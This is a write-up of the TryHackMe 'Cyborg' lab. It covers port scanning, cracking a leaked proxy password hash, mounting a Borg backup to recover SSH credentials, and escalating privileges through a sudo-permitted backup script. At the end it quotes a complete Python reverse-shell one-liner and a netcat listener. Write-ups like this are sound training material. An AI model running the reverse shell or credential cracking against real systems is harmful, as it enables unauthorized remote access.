Cyborg CTF Write-up
Hello, this is my walkthrough of Cyborg challenge from https://tryhackme.com
Nmap scan :
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we have 2 open ports ! and nothing special, lets check web page!
Its a simple Apache default page, so I ran a dirsearch and this is the result :
Lets check /admin
Simple page with a menu and we can notice a name called ‘Alex’
let's navigate to Admins and Archive to see what we can found!
Some random messages but with admin names: Josh/Adam/Alex
Let's check Archive now!
There is a download button when clicking on Archive this will download a tar file called archive to my computer!
So before extracting the content of this file let's check /etc path we already found with dirsearch!
A folder called squid
And something interesting here, it's like a backup and a password file!
The content of the passwd file was like this :
Its looks like a user and a password, I tried to crack the password and I succeded with “john pass.txt — wordlist=rockyou.txt”
so now we have ‘password1’
I tried to ssh with Alex and this password but no result also with music_archive as username but nothing !!
let's check the conf file, the content was like this :
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users
I had no idea what was that x)!!!
let's move to the tar file and see what inside!
I had no idea what this about till I read the content of the README file and it was like this :
“This is a Borg Backup repository.
So this was about a Borg backup repository and if you read the documentation given on the website above you will notice this
So sins we have the repo its possible to mount it as a filesystem, lets do it :
let's create a new directory “mkdir mounted” then mount the current path
“borg mount . mounted/”
This will request a password and as expected it's the password we already cracked before!
So now let's explore this in order to find something interesting!
After navigating in all the folders and files you will find a file called note.txt inside the Doc folder ! and content is about a user and password
I tried to use it in order to have an ssh connection and it works
Privilege escalation part :
The first thing I did was check Sudo -l
Hmmm Alex can run the /etc/mp3backups/backup.sh as root with no password!
Let's check the content of the backup.sh file
It's a backup system didn't try to understand how it works deeply, but from the other side I just cleared the file and replaced the contect with a python reverse shell like this one
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ip”,3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Then listening with nc lnvp 3333